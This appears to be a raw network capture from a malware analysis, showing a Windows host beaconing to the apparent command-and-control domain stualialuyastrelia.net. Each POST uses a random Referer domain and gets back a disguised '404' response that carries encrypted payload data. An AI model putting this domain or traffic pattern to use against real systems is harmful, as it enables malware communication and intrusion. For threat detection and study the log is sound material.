Dec 22, 2023 21:12:20.911840916 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mbmxkghdnfokse.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 260 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:20.911865950 CET	260	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 b1 ff 57 b7 Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bOW5w?d.hzDehkdG=="6y=%[1'"X\RCu1Y'j&v[GSkOF.H:!4av
Dec 22, 2023 21:12:21.199894905 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f1 72 8e 91 31 8c 96 e7 6c f0 0e 8c 92 98 23 9c d0 f4 a2 22 95 79 ad ce ab 6e 3e 6f 41 03 5a 3a 9a 95 d0 37 fb 9a d3 c8 f4 ce fb 4e 34 c8 e9 fc 81 7d 09 69 48 c2 51 34 c8 80 56 30 90 62 42 15 4d 94 8d 70 58 ca 82 cd ca 50 85 73 ba 57 b4 49 5d a5 0c 36 7c 83 c6 7d b7 dd 34 16 96 9c e6 03 4d 95 bf a4 56 a4 5e 0d 3c 90 c5 d0 f5 93 fc 59 fe 37 8d 84 3b 7a 0d 21 42 ad ec 32 91 72 d6 70 e7 13 d5 b4 a0 15 fc 01 dd dc 99 a7 49 7c 2b 04 07 27 89 89 72 3c 26 42 c1 db a2 96 1f d8 29 e9 38 70 78 f1 df 3e c7 fb 0b 6a a9 Data Ascii: 1f66=R7f0\|gW5p@E74o8>lR/wC9w/sY}hTm1@0c/&<M9l=SG9)(&a<xb\-8RN5DI?rTb`K+KRkoR:K\Bz<Lr?CoN%oL:=\ms :FgE#K,xU6L=<B>}(z:4A,YXbZ+7>ww?l($I`Usx1>X>7Yc6:/&(3?^cbc 6,Kx,-:dmT\v,N=XMu+}0+!m?iAE$KRy9Dc4b^_GT1+M6`OD%x ]5zWFJ1_tf$N@k;[JvMj,~+nlcIS06wNiV@9O\|jAf5~Xsl7CCPuH`L%jbvyP\|,IVGY}'"f\|+$;3R)Or"Mp~i[B\|zX9byoYu@`vW-pWPW/Im&$eIp1T[,V~yHY=xoO3 z/'KsBmFF^v)>KX"u)svE>3#2gn\GyZi~.<M`V8c/Fest9>}& "Kr1l#"yn>oAZ:7N4}iHQ4V0bBMpXPsWI]6\|}4MV^<Y7;z!B2rpI\|+'r<&B)8px>j
Dec 22, 2023 21:12:21.199913025 CET	1286	IN	Data Raw: 20 b5 83 8f ce c8 66 c5 57 bf b8 da a6 60 38 92 c4 04 f6 cc 46 bd 8a 94 a0 75 c2 1e 20 75 c2 9e a2 e5 8b 43 a3 3d c2 11 a2 a1 3e aa d0 63 97 97 8c 7c 09 4d de d5 1f e8 32 6c 17 91 cd a6 b1 ef 6a bb 2c 61 3c a3 64 65 32 0b b0 07 9a 5a a7 0a 52 44 Data Ascii: fW`8Fu uC=>c\|M2lj,a<de2ZRD@7I~2Xwc`cs&)2G(Nn.X4gx?04rMo[;KX06}]pU]%(9g]F[!'if\Ts)z
Dec 22, 2023 21:12:21.199994087 CET	1286	IN	Data Raw: 96 63 fd 15 63 42 c2 68 9a 8e 32 09 24 6a 18 ac 94 67 d9 21 1c e5 b3 35 16 f1 20 6b bb ed 7e e2 e0 c3 89 5c 2f 86 38 6d e5 35 c5 2a 33 ab b5 af db 01 e8 f6 1e ba 4c 58 f8 c4 54 7e 45 89 54 7e d6 f0 13 e6 7e ca fb 0d 3b cb 4b c4 4d b5 6d 84 f2 bb Data Ascii: ccBh2$jg!5 k~\/8m5*3LXT~ET~~;KMm{8lN4P<mpdhKcgJq4.]R8ej965ck1DsM%P^e)-5W:66$7'}Lj[3;9Oyyw;3W1b()
Dec 22, 2023 21:12:21.200011015 CET	1286	IN	Data Raw: f8 8c fe af 93 87 52 0a 60 74 1d e5 8f 0c f4 23 60 2e 0a 8f fe 46 9c 23 72 df 43 cb 1d 75 d7 59 e5 79 d6 c3 20 68 bb 5f 88 af fa 3e aa 25 70 fe 63 8c a9 96 08 cb cf 36 26 d0 06 9d 5b d1 97 e9 d1 7e 9e 1a 64 16 c3 25 57 9b 12 3e d0 8b 43 76 44 39 Data Ascii: R`t#`.F#rCuYy h_>%pc6&[~d%W>CvD99@l(\e-U #nm,Z\|I W];,B1z~6F Kz}fF 4v9k`HZ/O=Iy1 o>kCT\|?+hkq+R<`6
Dec 22, 2023 21:12:21.200026989 CET	1286	IN	Data Raw: ff 6f 02 f6 2f 2d 90 e2 e6 dd ab 7a a6 da d8 dd 7f cc ba e6 bb 6c b6 fc 1a 83 25 81 96 69 c0 be 97 ed c3 b2 07 73 e7 69 92 a1 3b 73 30 93 b7 36 d6 c9 f3 c7 e3 2e f1 bd cb 0f 61 a0 0a 97 9e 40 5b 5d 23 27 4d 30 31 5f 56 eb 52 fa db 74 ce 6b c7 a6 Data Ascii: o/-zl%isi;s06.a@[]#'M01_VRtkCuv.`lC3M.QdvL_KKo T:>t&^]b-6I_Shah*#\|sW[M:w0F%$yJ>3t\jS\Z!
Dec 22, 2023 21:12:21.200043917 CET	1286	IN	Data Raw: 38 ca 47 40 42 3c 2d e0 9f d1 21 78 38 fb 0d a1 18 5d 14 f5 c9 3a e6 2b e0 95 93 40 cb c8 24 a1 3d fd e8 f3 2b 84 3f d5 6a 1c 15 e8 1e 1a a3 17 33 2c 5a 1f 23 1a 81 2c 71 81 7b 99 ef 8d df 82 9b 69 4e cb 1c 44 24 48 3e 58 b2 2d 88 8f 54 5f f8 d6 Data Ascii: 8G@B<-!x8]:+@$=+?j3,Z#,q{iND$H>X-T_HNf]~B\|Zjx)R\|y2DBR B*Vuqm^ATQ`oVP"oXFwCf-%{+)27O_on]2Ozmw
Dec 22, 2023 21:12:21.200066090 CET	1286	IN	Data Raw: 1b c8 af d6 5e 17 b7 e1 60 fc e9 f8 25 b2 53 d4 f8 1b f0 d4 dd 79 a9 0e cc 03 68 df 76 a8 57 3a ef 8e 06 3c fe fd 2e 1d bd dd ec 83 a3 13 95 99 f5 20 f8 84 5f ac 3f 83 90 d8 f7 b4 db 8c 62 cb 0e 09 f5 0a 08 90 17 85 b3 18 b4 85 60 ed 0c c4 16 d4 Data Ascii: ^`%SyhvW:<. _?b`%h8!?5qIZYv~]8HKgLufxV#sf]:rWWAc:=z[7cS8t~s/ht,txuWHEHYzHZ
Dec 22, 2023 21:12:21.200086117 CET	1286	IN	Data Raw: 69 1e 79 51 23 c4 46 9f 19 ca b8 28 f5 98 c1 e3 1d b8 dd c8 35 9f 98 d3 6e 55 80 6e 66 7a 91 fd e6 42 d8 31 94 c5 8c 53 98 ce 85 80 a6 2c b2 91 9e 9f fd e3 f4 42 b3 db 64 f3 e0 22 04 65 94 51 15 43 ce 5d 19 c8 3e 8c 31 d7 d2 01 01 43 b5 6d 9d a1 Data Ascii: iyQ#F(5nUnfzB1S,Bd"eQC]>1CmB1Jq^vvh`+"?%HjBB_hv[3f\X:,'B?#)K;VdpW4R=sA^g%1\<Gy
Dec 22, 2023 21:12:21.200109005 CET	1286	IN	Data Raw: 1e f9 2f dc 67 49 e8 0b 98 33 a7 4e dd dd 24 35 ca 3f 73 8e 0a 43 8f a2 8c 6f 94 9f 0a ee 8b b2 00 f7 9a 7a 75 24 de bc ee ac a2 6c 54 68 1a ac d7 20 1c cf 01 83 da d0 7d 3b 4f 56 15 f2 09 a2 b4 8c 2c b4 cb af 34 c0 3c a5 16 03 22 0b d1 f4 90 12 Data Ascii: /gI3N$5?sCozu$lTh };OV,4<"\|,ulfJE\|SN0(g_"UXT_J<Zzy%/R,?u\d< JMY0yJEyep7v2l6J]XPxvB+Upf]hV\$r+2
Dec 22, 2023 21:12:21.200123072 CET	1286	IN	Data Raw: aa 02 c0 2f b9 32 2f 7b ff 3e c6 b2 c9 17 74 f1 7e 7e 80 c7 f4 ef 7a d7 dd 0b 67 0a ce 39 0c a9 ec ef 8a 1e d4 97 c8 74 62 e0 91 c6 f8 52 3a 50 aa d9 ff 58 73 c1 c5 44 a2 c4 12 cf 72 29 11 aa 5d 1c 3b b8 41 fe ec 9f ec 98 f0 79 3b 6f 5d 68 f3 a5 Data Ascii: /2/{>t~~zg9tbR:PXsDr)];Ay;o]hDXGligPPK/#[N,]=AwGx(SSAzlyXBl'`?)VgLS\|&Wee\|WU!rivBGA?~,cx
Dec 22, 2023 21:12:22.314374924 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hkqpktvuvcrohku.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:22.603501081 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f4 ff a9 71 a2 b8 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c1 a1 61 76 df f5 69 21 11 14 7e 5f af 9a 30 1d c9 a0 c1 a9 dd 7a 0d b0 4f 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3f 7c 88 28 c8 48 6e a1 c1 4a 9a 03 fd ec 9e ea 72 af 87 2b bd 61 f7 b5 42 bf 44 34 fd 78 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 64 9b 03 4c 49 56 ad f3 57 7b 2d ba 72 19 cd 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 e7 50 7b 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 f7 3d 66 49 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 c4 2e e6 5b 1e 44 ab 1e 26 75 10 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 81 7e 90 c7 7d 10 9f c0 ad df b3 99 27 98 8a cd 22 64 74 79 5c 6c 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f d0 56 ab 7a 8f b6 6c e0 cd 28 d8 37 00 52 ff 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d ed 26 2a 77 31 cc 01 45 2d 76 25 0d 3a e4 66 f9 45 d7 ee fe 9f ff a9 01 55 29 59 c5 7b 10 ac d6 d2 4c 7d 20 ef bd ce dd 11 83 28 02 f9 86 30 99 7b 1c 00 6e f5 21 11 72 36 a2 f5 ae f2 57 28 fb f2 b7 23 40 78 d1 6e 02 dd dc 04 81 33 Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGjT05sq733hsE\|WD<P5Q"f=(jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{2DqLavi!~_0zO,'Qa?\|(HnJr+aBD4xl#l)l~qxJO;ydLIVW{-r#u1yr+Lc1<'i3FHU=hU@P{9&(B@w=fId0QpKk^NTUc).[D&uWL\h)^cu~}'"dty\lCbzk{/dZFVzl(7R RH:M>Mpvn%.5_)CCUb:@3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=&*w1E-v%:fEU)Y{L} (0{n!r6W(#@xn3
Dec 22, 2023 21:12:25.572938919 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wvwwuqpkrmkoib.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:25.859786034 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 22, 2023 21:12:25.862653971 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ptngqnehptseyed.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:26.151077986 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 78 6f 15 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f 29 dc fa e0 19 8c 71 cd 37 33 33 6b 3a 47 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 81 06 5b fd 51 19 d0 93 79 42 b1 15 22 18 cf 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 61 4c b0 7b 06 45 f7 ff 78 ed 1a db de aa 11 13 bf 1e e1 92 24 08 4f c5 03 e3 f9 a1 19 5a de f5 69 f9 56 17 fe 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 70 42 bf 7a 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae b2 59 06 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 8b 0c 3c 27 d4 89 b3 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 c4 ed 43 40 77 bb c2 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 28 cc e0 8c 0a 96 fe c0 9b ae 1b 6f 53 cd 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5f 6b 81 ee f5 6c a8 df e6 1f e4 a6 cd 0f 9f 10 bd d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe ae 90 e9 02 76 10 61 0f 38 28 d2 6e 59 1f d0 d7 85 7a 8f fe 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e cd bc 70 d4 03 ab e3 98 76 72 0f ca 82 b1 0a 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 5a 0d ac 88 c1 a4 ee 33 25 d5 d8 a9 c3 72 e7 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 3d 08 1b 77 33 c3 00 45 11 42 10 0d 1e eb 67 f9 75 15 c6 fe cd f0 a8 01 b1 62 70 c5 07 1f ad d6 1c 55 4a 20 79 55 fa dd 1f cd 03 02 03 dc 03 99 89 14 20 6e 0f a9 37 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55 Data Ascii: 1f66`@0O}q4 IJ%9Wd8IkDJ8P>e%y^\.Kij}S.;vKs6(p_6k)\|pU~)Sh"xoT07x)q733k:GE\|WD<P52d=(,jC\SMUd[QyB"3Or>1Z:V/#BSSR+aL{Ex$OZiVEDzN,%Qa>\|(HkJ{/apBz4l3l)\|~qhJ77OyYLuFW;r#u1yR+L`rp<'3FHU=h?UyMC@w=fd0QpKk$1(oS)2([T&}WL\h_kltyPmCbzva8(nYzk7 